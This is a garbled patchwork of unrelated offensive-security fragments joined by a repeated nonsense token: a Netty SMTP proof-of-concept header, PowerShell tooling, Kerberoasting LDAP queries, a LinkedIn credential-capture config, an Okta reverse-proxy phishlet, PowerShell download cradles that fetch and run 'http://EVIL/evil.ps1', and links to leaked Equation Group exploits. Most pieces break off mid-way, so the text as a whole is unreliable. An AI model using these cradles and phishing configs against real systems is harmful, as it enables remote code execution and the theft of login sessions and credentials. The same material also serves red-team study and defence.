s3ancascadia

package com.depthfirst.poc;

import io.netty.handler.codec.smtp.SmtpRequest;
import io.netty.handler.codec.smtp.SmtpRequestEncoder;
import io.netty.handler.codec.smtp.SmtpRequests;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.buffer.ByteBuf;
import io.netty.util.CharsetUtil;
import io.netty.bootstrap.Bootstrap;
import io.netty.channel.*;

s3ancascadia

# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)

Function New-ScheduledTaskSession {
    <#
    .SYNOPSIS
    Creates a PSSession for a process running as a scheduled task.

    .DESCRIPTION
    Creates a PSSession that can be used to run code inside a scheduled task

s3ancascadia

List was compiled by Jonathan Johnson (@jsecurity101) and Carlos Perez (@Carlos_Perez)

Queries are not complete and are meant to be a reference. If you are using them for hunting use a contains within the query language.

• Kerberoasting
  • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
  • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))
  • (&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))
• Attributes with passwords
• (userpassword=*)

s3ancascadia

# evilpuppet add-on for Linkedin

evilpuppet:
  triggers:
    - domains: ['www.linkedin.com']
      paths: ['/checkpoint/lg/login-submit']
      token: 'apfc'
      open_url: 'https://www.linkedin.com/login'
      actions:
        - selector: '#username'

s3ancascadia

name: 'Okta'
author: 'www.simplerhacking.com'
min_ver: '3.0.0'
proxy_hosts:
 - {phish_sub: 'okta-tenant-here', orig_sub: 'okta-tenant-here', domain: 'okta.com', session: true, is_landing: true, auto_filter: true}
sub_filters:
 - {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'okta-tenant-here.okta.com', replace: '{hostname}', mimes: ['application/ion+json']}
 - {triggers_on: 'okta-tenant-here', orig_sub: '', domain: 'okta-tenant-here', search: 'https.*\.okta\.com', replace: 'https://{hostname}', mimes: ['text/html']}
auth_tokens:
 - domain: 'okta-tenant-here'

s3ancascadia

#Requires -Version 2

function New-ADPayload {
<#
    .SYNOPSIS

        Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
        a one-line launcher.

        Author: @harmj0y

s3ancascadia

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

s3ancascadia

#!/bin/bash
set -e

GO_VERSION="1.20.6"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="b945ae2bb5db01a0fb4786afde64e6fbab50b67f6fa0eb6cfa4924f16a7ff1eb"

# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1

s3ancascadia

Links describing the leaked EQ Group tools for Windows

Repositories and ports

• Lost in Translation - A repository of the leaked tools

• MS17-010 - Port of some of the exploits to Windows 10

Installation and usage guides